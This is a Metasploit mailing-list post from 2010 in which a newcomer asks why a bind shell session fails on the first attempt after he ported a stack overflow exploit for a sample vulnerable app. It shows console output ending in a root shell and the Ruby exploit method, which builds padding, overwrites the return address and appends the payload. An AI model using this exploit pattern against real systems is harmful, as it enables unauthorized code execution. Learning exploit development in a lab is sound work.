Metasploit mailing list archives

Unsuccessful connection after successful exploit


From: Eloi Sanfèlix <eloi () limited-entropy com>
Date: Thu, 11 Feb 2010 20:16:05 +0100

Hi all,

I'm quite new to Metasploit, and I've started by porting a little exploit
for a sample vulnerable app I had on my hard disk. I also ported an execve
payload and a bind shell payload just to see how the framework works.

When I run the exploit with the execve shellcode everything is fine, I can
see my shell pop in the attacked process under an emulator. However, when I
run the bind shell payload something weird happens. At a first attempt,
metasploit tries to connect to the new session, but fails and closes the
session:

msf exploit(stack) > set payload shell_bind_tcp
msf exploit(stack) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(stack) > set LPORT 1234
LPORT => 1234
msf exploit(stack) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (127.0.0.1:39112 -> 127.0.0.1:1234)


[*] Command shell session 1 closed.

However, if I look at my emulated system, the exploit actually succeeded and
it is executing a shell and listening for incoming connections on the
selected port. Now, if I call exploit again, metasploit successfully
connects to the shell created previously as you can see below:

msf exploit(stack) > exploit

[*] Started bind handler
[*] Command shell session 2 opened (127.0.0.1:59482 -> 127.0.0.1:1234)

/bin/id
uid=0(root) gid=0(root)

I tried to understand what is happening, but I fail to do so. In case it is
useful, here is the basic structure of my exploit:

       def exploit
          connect
          # Pad up to the saved return address with 4-byte filler words
          repeat = target['Offset'] / 4
          junk = "AAAA" * repeat
          # Overwrite the return address (32-bit little-endian) and append the payload
          sploit = junk + [target.ret].pack('V') + payload.encoded
          # The sample app reads a 32-bit little-endian length prefix before the data
          real_sploit = [sploit.length].pack('V') + sploit
          sock.put(real_sploit)

          # Start the bind handler (connects to LPORT), then drop the exploit socket
          handler
          disconnect
       end

Pretty simple as you can see. Also, the payload has the same structure as
any other Bind TCP payload. Specifically, it defines the following handler
and session options:

                        'Handler'       => Msf::Handler::BindTcp,
                        'Session'       => Msf::Sessions::CommandShell,

Does anyone have an idea about why it could go wrong?

Thanks in advance for your feedback.

Eloi

PS: I also tried adding a little delay between sending the payload and
calling handler, but it doesn't help.